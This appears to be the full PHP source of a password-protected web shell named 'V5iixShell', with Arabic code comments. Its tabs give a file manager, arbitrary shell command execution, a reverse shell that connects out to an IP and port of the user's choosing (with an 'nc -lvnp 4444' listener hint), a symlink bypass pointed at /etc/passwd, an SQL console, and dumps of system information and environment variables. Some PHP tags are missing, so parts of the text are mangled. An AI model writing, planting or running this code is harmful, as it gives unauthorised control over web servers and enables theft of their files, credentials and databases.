session_start();error_reporting(0);set_time_limit(0);ini_set('memory_limit', '-1');ini_set('upload_max_filesize', '50M');ini_set('post_max_size', '50M');echo ini_get("disable_functions");$password = "admin5iix"; if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) { if (isset($_POST['login_password'])) { if ($_POST['login_password'] === $password) { $_SESSION['logged_in'] = true; } else { $login_error = "Incorrect password!"; showLoginForm($login_error); exit; } } else { showLoginForm(); exit; }}function showLoginForm($error = "") { echo '<!DOCTYPE html> <html dir="rtl"> <meta charset="UTF-8">Login <title>Login</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif; background-color: #191919ff; color: white; display: flex; justify-content: center; align-items: center; min-height: 100vh; padding: 20px; } .login-wrapper { display: flex; width: 100%; max-width: 600px; gap: 30px; background: rgba(255, 255, 255, 0.05); border-radius: 15px; padding: 20px; box-shadow: 0 10px 30px rgba(0, 0, 0, 0.3); } .login-form { flex: 1; padding: 30px; background: rgba(255, 255, 255, 0.03); border-radius: 10px; backdrop-filter: blur(5px); } .login-form h2 { text-align: center; color: #fff; margin-bottom: 30px; font-size: 24px; font-weight: 600; } .input-group { margin-bottom: 20px; } input[type="password"] { width: 100%; padding: 14px; border: 1px solid #333; border-radius: 8px; background: rgba(255, 255, 255, 0.1); color: white; font-size: 16px; outline: none; transition: border 0.3s ease; } input[type="password"]:focus { border-color: #4CAF50; background: rgba(255, 255, 255, 0.15); } button { background: #4CAF50; color: white; border: none; padding: 14px; border-radius: 8px; cursor: pointer; font-size: 16px; width: 100%; transition: background 0.3s ease; } button:hover { background: #45a049; } .error { background: #f44336; color: white; padding: 10px; border-radius: 5px; margin-bottom: 20px; font-size: 14px; } .anime-image { flex: 1; display: flex; justify-content: center; align-items: center; position: relative; } .anime-image img { width: 100%; height: 100%; object-fit: cover; border-radius: 5px; border: 3px solid #4CAF50; box-shadow: 0 0 15px rgba(76, 175, 80, 0.3); transition: transform 0.3s ease; } </style> <div class="login-wrapper"> <div class="login-form">

sys5iix

'; if (!empty($error)) { echo '<div class="error">' . htmlspecialchars($error) . '</div>'; } echo '
<div class="input-group"> </div> <button type="submit">continue</button>
</div> <div class="anime-image"> <img src="https://i.imgur.com/sVvS0H1.jpeg" alt="hacker"> </div> </div> ';}function getUploadError($error_code) { switch ($error_code) { case UPLOAD_ERR_INI_SIZE: return 'File size exceeds server limit'; case UPLOAD_ERR_FORM_SIZE: return 'File size exceeds form limit'; case UPLOAD_ERR_PARTIAL: return 'File was only partially uploaded'; case UPLOAD_ERR_NO_FILE: return 'No file was uploaded'; case UPLOAD_ERR_NO_TMP_DIR: return 'Missing temporary folder'; case UPLOAD_ERR_CANT_WRITE: return 'Failed to write file to disk'; case UPLOAD_ERR_EXTENSION: return 'File upload stopped by extension'; default: return 'Unknown upload error'; }}function perms($file) { $perms = fileperms($file); switch ($perms & 0xF000) { case 0xC000: $info = 's'; break; case 0xA000: $info = 'l'; break; case 0x8000: $info = 'r'; break; case 0x6000: $info = 'b'; break; case 0x4000: $info = 'd'; break; case 0x2000: $info = 'c'; break; case 0x1000: $info = 'p'; break; default: $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info;}function formatSize($bytes) { if ($bytes >= 1099511627776) return round($bytes / 1099511627776, 2) . 'T'; if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . 'G'; if ($bytes >= 1048576) return round($bytes / 1048576, 2) . 'M'; if ($bytes >= 1024) return round($bytes / 1024, 2) . 'K'; return $bytes . 'B';}function scanDirRecursive($dir, $depth = 0, $maxDepth = 3) { if ($depth > $maxDepth) return []; $result = []; if (!is_dir($dir)) return $result; $files = @scandir($dir); if (!$files) return $result; foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $file; try { $isDir = is_dir($path); $result[] = [ 'name' => $file, 'path' => $path, 'is_dir' => $isDir, 'size' => $isDir ? 0 : @filesize($path), 'perms' => perms($path), 'mtime' => @date('Y-m-d H:i', @filemtime($path)), 'owner' => @posix_getpwuid(@fileowner($path))['name'], 'group' => @posix_getgrgid(@filegroup($path))['name'] ]; if ($isDir && $depth < $maxDepth) { $result = array_merge($result, scanDirRecursive($path, $depth + 1, $maxDepth)); } } catch (Exception $e) { continue; } } return $result;}function getFileType($file) { $mime = mime_content_type($file); if (strpos($mime, 'text') !== false) return 'text'; if (strpos($mime, 'image') !== false) return 'image'; if (strpos($mime, 'application') !== false) return 'binary'; return 'unknown';}function highlightCode($content, $ext) { $highlight = [ 'php' => 'php', 'js' => 'javascript', 'html' => 'html', 'css' => 'css', 'py' => 'python', 'sh' => 'bash', 'sql' => 'sql' ]; if (isset($highlight[$ext])) { return highlight_string($content, true); } return '<pre>' . htmlspecialchars($content) . '</pre>';}function isUploadable($path) { if (!is_writable($path)) { @chmod($path, 0755); return is_writable($path); } return true;}// دالة لإنشاء رابط رمزيfunction createSymlink($target, $link) { if (file_exists($link)) { return "Error: Link already exists"; } if (symlink($target, $link)) { return "Symlink created successfully: $link -> $target"; } else { return "Failed to create symlink: $link -> $target"; }}// دالة للاتصال بقاعدة البياناتfunction dbConnect($host, $user, $pass, $dbname) { try { $dsn = "mysql:host=$host;dbname=$dbname;charset=utf8"; $pdo = new PDO($dsn, $user, $pass); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); return $pdo; } catch (PDOException $e) { return "Connection failed: " . $e->getMessage(); }}// دالة لتنفيذ استعلام SQLfunction executeQuery($pdo, $query) { try { $stmt = $pdo->prepare($query); $stmt->execute(); if (strtoupper(substr(trim($query), 0, 6)) === 'SELECT') { $results = $stmt->fetchAll(PDO::FETCH_ASSOC); return $results; } else { return "Query executed successfully. Affected rows: " . $stmt->rowCount(); } } catch (PDOException $e) { return "Query failed: " . $e->getMessage(); }}$path = isset($_GET['p']) ? $_GET['p'] : getcwd();$action = isset($_GET['a']) ? $_GET['a'] : (isset($_POST['a']) ? $_POST['a'] : '');$target = isset($_GET['t']) ? $_GET['t'] : '';if ($action === 'download' && $target && is_file($target)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($target).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($target)); readfile($target); exit;}if (!empty($action)) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['p'])) { $path = $_POST['p']; } elseif (isset($_GET['p'])) { $path = $_GET['p']; } switch ($action) { case 'upload': if (!isset($_FILES['f']) || $_FILES['f']['error'] === UPLOAD_ERR_NO_FILE) { $error = "No file selected for upload"; break; } if ($_FILES['f']['error'] !== UPLOAD_ERR_OK) { $error = "Upload error: " . getUploadError($_FILES['f']['error']); break; } $targetPath = $path . DIRECTORY_SEPARATOR . basename($_FILES['f']['name']); if (file_exists($targetPath)) { $error = "File already exists: " . $_FILES['f']['name']; break; } if (!is_writable($path)) { @chmod($path, 0755); if (!is_writable($path)) { $error = "Destination not writable: " . $path; break; } } if (move_uploaded_file($_FILES['f']['tmp_name'], $targetPath)) { $message = "Upload successful: " . $_FILES['f']['name']; @chmod($targetPath, 0644); } else { $error = "Upload failed: " . $_FILES['f']['name']; $lastError = error_get_last(); if ($lastError) { $error .= " - " . $lastError['message']; } } break; case 'delete': if ($target) { if (is_dir($target)) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($target, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST ); foreach ($files as $fileinfo) { $todo = ($fileinfo->isDir() ? 'rmdir' : 'unlink'); @$todo($fileinfo->getRealPath()); } @rmdir($target); $message = "Deleted directory: " . basename($target); } else { if (@unlink($target)) { $message = "Deleted file: " . basename($target); } else { $error = "Failed to delete: " . basename($target); } } } break; case 'execute': $cmd = $_POST['cmd']; $output = @shell_exec($cmd . ' 2>&1'); break; case 'reverse': $ip = $_POST['ip']; $port = $_POST['port']; if (function_exists('fsockopen')) { $sock = @fsockopen($ip, $port, $errno, $errstr, 30); if ($sock) { fwrite($sock, "Reverse shell connected\n"); while (!feof($sock)) { $cmd = fread($sock, 1024); $res = @shell_exec($cmd); fwrite($sock, $res); } fclose($sock); $message = "Reverse shell established"; } else { $error = "Connection failed: $errstr ($errno)"; } } else { $error = "fsockopen not available"; } break; case 'create_dir': $dirName = isset($_POST['dir_name']) ? $_POST['dir_name'] : ''; if ($dirName) { $newDir = $path . DIRECTORY_SEPARATOR . $dirName; if (!file_exists($newDir)) { if (@mkdir($newDir, 0755, true)) { $message = "Created directory: $dirName"; } else { $error = "Failed to create directory: $dirName"; } } else { $error = "Directory already exists: $dirName"; } } break; case 'create_file': $fileName = isset($_POST['file_name']) ? $_POST['file_name'] : ''; if ($fileName) { $newFile = $path . DIRECTORY_SEPARATOR . $fileName; if (!file_exists($newFile)) { if (@file_put_contents($newFile, '')) { $message = "Created file: $fileName"; } else { $error = "Failed to create file: $fileName"; } } else { $error = "File already exists: $fileName"; } } break; case 'edit': if (isset($_POST['content'])) { $content = $_POST['content']; if (@file_put_contents($target, $content)) { $message = "Saved: " . basename($target); } else { $error = "Failed to save: " . basename($target); } } break; case 'compress': if (class_exists('ZipArchive') && $target) { $zip = new ZipArchive(); $zipName = basename($target) . '.zip'; $zipPath = $path . DIRECTORY_SEPARATOR . $zipName; if ($zip->open($zipPath, ZipArchive::CREATE) === TRUE) { if (is_dir($target)) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($target), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen(dirname($target)) + 1); $zip->addFile($filePath, $relativePath); } } } else { $zip->addFile($target, basename($target)); } $zip->close(); $message = "Compressed to: $zipName"; } else { $error = "Failed to create archive"; } } else { $error = "ZipArchive not available"; } break; // إضافة معالجة لإنشاء الروابط الرمزية case 'symlink': $symlink_target = $_POST['symlink_target']; $symlink_name = $_POST['symlink_name']; $symlink_path = $path . DIRECTORY_SEPARATOR . $symlink_name; $result = createSymlink($symlink_target, $symlink_path); if (strpos($result, 'successfully') !== false) { $message = $result; } else { $error = $result; } break; // إضافة معالجة للاستعلامات SQL case 'sql_query': $db_host = $_POST['db_host']; $db_user = $_POST['db_user']; $db_pass = $_POST['db_pass']; $db_name = $_POST['db_name']; $sql_query = $_POST['sql_query']; $pdo = dbConnect($db_host, $db_user, $db_pass, $db_name); if (is_string($pdo)) { $error = $pdo; } else { $result = executeQuery($pdo, $sql_query); if (is_array($result)) { $sql_results = $result; } else { $message = $result; } } break; }}$systemInfo = [ 'OS' => 'Full: ' . Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64 . ' | System: ' . php_uname('s') . ' | Release: ' . php_uname('r') . ' | Version: ' . php_uname('v') . ' | Machine: ' . php_uname('m') . ' | Host: ' . php_uname('n') . ' | Kernel: ' . (function_exists('shell_exec') ? trim(shell_exec('uname -r 2>/dev/null')) : 'N/A') . ' | Uptime: ' . (function_exists('shell_exec') ? trim(shell_exec('uptime 2>/dev/null')) : 'N/A') . ' | Load Avg: ' . (function_exists('shell_exec') ? trim(shell_exec('cat /proc/loadavg 2>/dev/null')) : 'N/A') . ' | Distro: ' . (function_exists('shell_exec') ? trim(shell_exec('cat /etc/*release 2>/dev/null | grep PRETTY_NAME | cut -d= -f2')) : 'N/A'), 'PHP' => 'Version: ' . phpversion() . ' | SAPI: ' . php_sapi_name() . ' | Extensions: ' . implode(', ', get_loaded_extensions()) . ' | Memory Limit: ' . ini_get('memory_limit') . ' | Max Execution: ' . ini_get('max_execution_time') . ' | Upload Max: ' . ini_get('upload_max_filesize') . ' | Post Max: ' . ini_get('post_max_size') . ' | Display Errors: ' . ini_get('display_errors') . ' | OPcache: ' . (extension_loaded('Zend OPcache') ? 'Enabled' : 'Disabled') . ' | JIT: ' . (ini_get('opcache.jit_buffer_size') ? 'Active' : 'Inactive') . ' | Realpath Cache: ' . print_r(realpath_cache_size(), true), 'Server' => 'Software: ' . ($_SERVER['SERVER_SOFTWARE'] ?? 'Unknown') . ' | IP: ' . ($_SERVER['SERVER_ADDR'] ?? 'Unknown') . ' | Port: ' . ($_SERVER['SERVER_PORT'] ?? 'Unknown') . ' | Name: ' . ($_SERVER['SERVER_NAME'] ?? 'Unknown') . ' | Admin: ' . ($_SERVER['SERVER_ADMIN'] ?? 'Unknown') . ' | Protocol: ' . ($_SERVER['SERVER_PROTOCOL'] ?? 'Unknown') . ' | Gateway: ' . ($_SERVER['GATEWAY_INTERFACE'] ?? 'Unknown') . ' | Document Root: ' . ($_SERVER['DOCUMENT_ROOT'] ?? 'Unknown') . ' | HTTPS: ' . (!empty($_SERVER['HTTPS']) ? 'Yes' : 'No') . ' | Requests: ' . ($_SERVER['REQUEST_METHOD'] ?? 'N/A') . ' | Server Signature: ' . ($_SERVER['SERVER_SIGNATURE'] ?? 'N/A'), 'IP' => 'Server: ' . ($_SERVER['SERVER_ADDR'] ?? 'Unknown') . ' | Remote: ' . ($_SERVER['REMOTE_ADDR'] ?? 'Unknown') . ' | Forwarded: ' . ($_SERVER['HTTP_X_FORWARDED_FOR'] ?? 'N/A') . ' | Client: ' . ($_SERVER['HTTP_CLIENT_IP'] ?? 'N/A') . ' | Host: ' . ($_SERVER['HTTP_HOST'] ?? 'Unknown') . ' | Proxy: ' . ($_SERVER['HTTP_VIA'] ?? 'N/A') . ' | Port: ' . ($_SERVER['REMOTE_PORT'] ?? 'N/A') . ' | DNS: ' . gethostbyaddr($_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'), 'User' => 'Current: ' . get_current_user() . ' | Effective: ' . (function_exists('posix_geteuid') ? posix_geteuid() . ' (' . (function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid())['name'] : 'Unknown') . ')' : 'N/A') . ' | Process: ' . getmyuid() . ' | Group: ' . (function_exists('posix_getegid') ? posix_getegid() : 'N/A') . ' | Script Owner: ' . (function_exists('getmyuid') ? getmyuid() : 'N/A') . ' | Home Dir: ' . (function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid())['dir'] ?? 'N/A' : 'N/A') . ' | Shell: ' . (function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid())['shell'] ?? 'N/A' : 'N/A'), 'Memory' => 'Usage: ' . formatSize(memory_get_usage(true)) . ' | Real: ' . formatSize(memory_get_usage(false)) . ' | Peak: ' . formatSize(memory_get_peak_usage(true)) . ' | Limit: ' . ini_get('memory_limit') . ' | Peak Real: ' . formatSize(memory_get_peak_usage(false)) . ' | System Total: ' . (function_exists('shell_exec') ? trim(shell_exec('free -b 2>/dev/null | grep Mem:')) : 'N/A') . ' | System Free: ' . (function_exists('shell_exec') ? trim(shell_exec('free -b 2>/dev/null | grep Mem:')) : 'N/A'), 'Time' => 'Current: ' . date('Y-m-d H:i:s') . ' | Timestamp: ' . time() . ' | Timezone: ' . date_default_timezone_get() . ' | Microtime: ' . microtime(true) . ' | Day: ' . date('l') . ' | Date: ' . date('F j, Y') . ' | UTC Offset: ' . date('P') . ' | Server Uptime: ' . (function_exists('shell_exec') ? trim(shell_exec('uptime -p 2>/dev/null')) : 'N/A') . ' | Last Boot: ' . (function_exists('shell_exec') ? trim(shell_exec('who -b 2>/dev/null')) : 'N/A')];$dirs = [ '/', '/home', '/etc', '/var', '/usr', '/tmp', '/root', '/opt', '/bin', '/sbin', '/lib', '/lib64', '/boot', '/dev', '/proc', '/sys', '/run', '/mnt', '/media', '/srv', '/selinux', '/var/log', '/var/www', '/usr/local', '/etc/nginx', '/etc/apache2', '/lib32', '/usr/bin', '/usr/sbin', '/usr/lib', '/usr/libexec', '/usr/share', '/usr/include', '/usr/src', '/usr/local/bin', '/usr/local/sbin', '/usr/local/lib', '/usr/local/share', '/etc/nginx/sites-available', '/etc/nginx/sites-enabled', '/etc/apache2/sites-available', '/etc/apache2/sites-enabled', '/etc/httpd', '/etc/systemd', '/etc/ssh', '/etc/cron.d', '/etc/cron.daily', '/etc/cron.weekly', '/etc/cron.hourly', '/etc/cron.monthly', '/etc/letsencrypt', '/etc/ssl', '/etc/pki', '/etc/php', '/etc/mysql', '/etc/postgresql', '/etc/redis', '/etc/supervisor', '/etc/samba', '/etc/netplan', '/etc/network', '/etc/sysconfig', '/var/lib', '/var/cache', '/var/spool', '/var/tmp', '/var/backups', '/var/mail', '/var/opt', '/var/www/html', '/var/lib/docker', '/var/lib/containers', '/var/lib/flatpak', '/var/lib/snapd', '/var/snap', '/srv/www', '/srv/http', '/srv/ftp', '/boot/efi', '/snap', '/lost+found', '/cdrom'];<!DOCTYPE html>WS - Enhanced <title>WS - Enhanced</title> <style> body { background: #002200; color: rgba(32, 201, 32, 1); font-family: 'Courier New', monospace; margin: 0; padding: 0; font-size: 14px; } .hero{ position: fixed; top: 0; right: 0; width: 200px; height: 99vh; background-image: url('https://media.tenor.com/EjSfJBsaGQkAAAAj/anime-girl.gif'); background-repeat: no-repeat; background-position: center 100%; background-size: 220px auto; pointer-events: none; z-index: 2; } .hero::after{ content: ""; position: absolute; left: 55%; bottom: 70px; transform: translateX(-50%); padding: 4px 20px; border-radius: 10px; color: #fff; font: 800 24px/1.1 ui-monospace, SFMono-Regular, Consolas, Menlo, monospace; letter-spacing: .5px; -webkit-text-stroke: 1px rgba(0,0,0,.85); text-shadow: 0 2px 10px rgba(0,0,0,.35); background: rgba(0,0,0,.25); backdrop-filter: blur(2px); -webkit-backdrop-filter: blur(2px); } .container { max-width: 1600px; margin: 0 auto; padding: 20px; } a { color: #0f0; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin: 10px 0; } th, td { padding: 8px; border: 1px solid #050; text-align: left; } th { background: #002200; } tr:hover { background: #003300; } input, select, textarea { background: #001100; color: #0f0; border: 1px solid #050; padding: 6px; font-family: 'Courier New', monospace; font-size: 14px; } button { background: #002200; color: #0f0; border: 1px solid #050; padding: 6px 12px; cursor: pointer; font-family: 'Courier New', monospace; font-size: 14px; } button:hover { background: #004400; } .success { color: #0f0; padding: 10px; border: 1px solid #050; margin: 10px 0; background: #002200; } .error { color: #f00; padding: 10px; border: 1px solid #500; margin: 10px 0; background: #220000; } .panel { background: #001100; border: 1px solid #050; padding: 15px; margin: 15px 0; } .terminal { background: #000; color: #0f0; padding: 10px; border: 1px solid #050; height: 300px; overflow-y: auto; font-family: 'Courier New', monospace; white-space: pre-wrap; } .editor { background: #000; color: #0f0; padding: 10px; border: 1px solid #050; width: 100%; height: 400px; font-family: 'Courier New', monospace; } .header { background: #001a00; padding: 15px; border-bottom: 1px solid #050; margin-bottom: 20px; } .tabs { display: flex; background: #001100; border-bottom: 1px solid #050; margin-bottom: 20px; } .tab { padding: 12px 20px; cursor: pointer; border-right: 1px solid #050; } .tab.active { background: #002200; font-weight: bold; } .tab-content { display: none; } .tab-content.active { display: block; } .file-actions a { margin: 0 5px; } .highlight { background: #003300; padding: 2px 4px; } .sql-results { max-height: 400px; overflow-y: auto; margin-top: 10px; border: 1px solid #050; padding: 10px; background: #001100; } .sql-table { width: 100%; border-collapse: collapse; margin: 10px 0; } .sql-table th, .sql-table td { border: 1px solid #050; padding: 5px; text-align: left; } </style> <div class="hero"></div> <div class="header">

V5iixShell - 0.1

<div>System: echo $systemInfo['OS']; | PHP: echo $systemInfo['PHP']; </div> </div> <div class="container"> <div class="tabs"> <div class="tab active" onclick="showTab('files')">File Manager</div> <div class="tab" onclick="showTab('execute')">Execute</div> <div class="tab" onclick="showTab('reverse')">Reverse Shell</div> <div class="tab" onclick="showTab('symlink')">Symlink Bypass </div> <div class="tab" onclick="showTab('sql')">SQL Manager </div> <div class="tab" onclick="showTab('system')">System Info</div> </div> <div id="files" class="tab-content active"> <!-- محتوى إدارة الملفات الحالي --> <div class="panel"> <strong>Quick Access:</strong> foreach (array_slice($dirs, 0, 10) as $dir): <a href="?p= echo urlencode($dir); "> echo $dir; </a> | endforeach;

<strong>Current Path:</strong> echo htmlspecialchars($path); </div> if (isset($message)): <div class="success"> echo $message; </div> endif; if (isset($error)): <div class="error"> echo $error; </div> endif; <div class="panel">

File Operations

<button type="submit" name="a" value="create_dir">Create Dir</button>
<button type="submit" name="a" value="create_file">Create File</button>
<button type="submit" name="a" value="upload">Upload</button>
</div> <div class="panel">

File Listing

<th>Type</th> <th>Name</th> <th>Size</th> <th>Permissions</th> <th>Modified</th> <th>Owner</th> <th>Actions</th> if ($path !== '/'): endif; if (is_dir($path)) { $items = @scandir($path); if ($items) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $fullPath = $path . DIRECTORY_SEPARATOR . $item; try { $isDir = is_dir($fullPath); $size = $isDir ? '-' : formatSize(@filesize($fullPath)); $perms = perms($fullPath); $mtime = @date('Y-m-d H:i', @filemtime($fullPath)); $owner = @posix_getpwuid(@fileowner($fullPath))['name']; $group = @posix_getgrgid(@filegroup($fullPath))['name']; echo " <td class='file-actions'>"; if ($isDir) { echo "<a href='?p=" . urlencode($fullPath) . "'>Open</a> | "; echo "<a href='?a=compress&t=" . urlencode($fullPath) . "'>Zip</a> | "; } else { $ext = pathinfo($fullPath, PATHINFO_EXTENSION); if (in_array($ext, [ 'php', 'html', 'css', 'js', 'log', 'pdf', 'conf', 'sh', 'txt','log','md','markdown','rst','php','phtml','phps','inc','html','htm','xhtml', 'xml','svg','css','less','scss','sass', 'js','mjs','ts','tsx','json','jsonc','ndjson', 'yml','yaml','ini','conf','cfg','cnf','properties','toml', 'csv','tsv','sql','sh','bash','zsh','ksh','fish','bat','cmd','ps1','psm1','psd1', 'py','rb','pl','lua','go','rs','java','kt','c','h','hpp','cpp','cxx','cs','dart', 'scala','groovy','phtml','phps','sh','bash','zsh','ps1','cmd','pl' ])) { echo "<a href='?a=edit&t=" . urlencode($fullPath) . "'>Edit</a> | "; } echo "<a href='?a=download&t=" . urlencode($fullPath) . "'>Download</a> | "; echo "<a href='?a=compress&t=" . urlencode($fullPath) . "'>Zip</a> | "; } echo "<a href='?a=delete&t=" . urlencode($fullPath) . "' onclick='return confirm(\"Delete?\")'>Del</a> "; } catch (Exception $e) { continue; } } } }
d <a href="?p= echo urlencode(dirname($path)); ">..</a> - - - - -
" . ($isDir ? 'd' : '-') . " " . ($isDir ? "<a href='?p=" . urlencode($fullPath) . "'>$item</a>" : $item) . " $size <span class='highlight'>$perms</span> $mtime $owner:$group
</div> if ($action === 'edit' && $target && is_file($target)): <div class="panel">

Editing: echo htmlspecialchars(basename($target));

<textarea name="content" class="editor"> echo htmlspecialchars(@file_get_contents($target)); </textarea>

<button type="submit">Save</button> <button type="button" onclick="window.location='?p= echo urlencode(dirname($target)); '">Cancel</button>
</div> endif; </div> <div id="execute" class="tab-content"> <!-- محتوى Execute الحالي --> <div class="panel">

Execute Command

<button type="submit">Run</button>
if (isset($output)): <div class="terminal"> echo htmlspecialchars($output); </div> endif; </div> <div class="panel">

Common Commands

<div> <a href="#" onclick="document.querySelector('input[name=cmd]').value='ls -la'; return false;">ls -la</a> | <a href="#" onclick="document.querySelector('input[name=cmd]').value='whoami'; return false;">whoami</a> | <a href="#" onclick="document.querySelector('input[name=cmd]').value='id'; return false;">id</a> | <a href="#" onclick="document.querySelector('input[name=cmd]').value='ps aux'; return false;">ps aux</a> | <a href="#" onclick="document.querySelector('input[name=cmd]').value='netstat -an'; return false;">netstat</a> | <a href="#" onclick="document.querySelector('input[name=cmd]').value='find / -name *.log 2>/dev/null'; return false;">find logs</a> </div> </div> </div> <div id="reverse" class="tab-content"> <!-- محتوى Reverse Shell الحالي --> <div class="panel">

Reverse Shell

<label>IP: </label> <label>Port: </label> <button type="submit">Connect</button>
<div style="margin-top: 15px;"> <strong>Listener:</strong> nc -lvnp 4444 </div> </div> </div> <div id="symlink" class="tab-content"> <!-- محتوى Symlink Bypass الجديد --> <div class="panel">

Symlink Bypass 🔗

<div> <label>Target Path:</label> </div> <div style="margin-top: 10px;"> <label>Link Name:</label> </div> <div style="margin-top: 10px;"> <button type="submit">Create Symlink</button> </div>
</div> <div class="panel">

Symlink Information

<p>Symlinks allow you to create shortcuts to files or directories. This can be useful for bypassing restrictions or accessing files outside the web root.</p> <p><strong>Example:</strong> Create a symlink to /etc/passwd named "passwd_link" to access the system password file.</p> </div> </div> <div id="sql" class="tab-content"> <!-- محتوى SQL Manager الجديد --> <div class="panel">

SQL Manager 💾

<div> <label>Host:</label> </div> <div style="margin-top: 10px;"> <label>Username:</label> </div> <div style="margin-top: 10px;"> <label>Password:</label> </div> <div style="margin-top: 10px;"> <label>Database:</label> </div> <div style="margin-top: 10px;"> <label>SQL Query:</label> <textarea name="sql_query" placeholder="SELECT * FROM users;" style="width: 100%; height: 100px;" required></textarea> </div> <div style="margin-top: 10px;"> <button type="submit">Execute Query</button> </div>
</div> if (isset($sql_results)): <div class="panel">

Query Results

<div class="sql-results"> if (is_array($sql_results) && count($sql_results) > 0): <table class="sql-table"> foreach (array_keys($sql_results[0]) as $column): <th> echo htmlspecialchars($column); </th> endforeach; foreach ($sql_results as $row): foreach ($row as $value): echo htmlspecialchars($value); endforeach; endforeach; else: <p>No results found.</p> endif; </div> </div> endif; </div> <div id="system" class="tab-content"> <!-- محتوى System Info الحالي --> <div class="panel">

System Information

foreach ($systemInfo as $key => $value): endforeach;
<strong> echo $key; :</strong> echo $value;
</div> <div class="panel">

Environment Variables

<div class="terminal" style="height: 200px;"> foreach ($_ENV as $key => $value) { echo "$key=$value\n"; } </div> </div> </div> </div> <script> function showTab(tabId) { document.querySelectorAll('.tab-content').forEach(tab => { tab.classList.remove('active'); }); document.querySelectorAll('.tab').forEach(tab => { tab.classList.remove('active'); }); document.getElementById(tabId).classList.add('active'); event.currentTarget.classList.add('active'); } </script>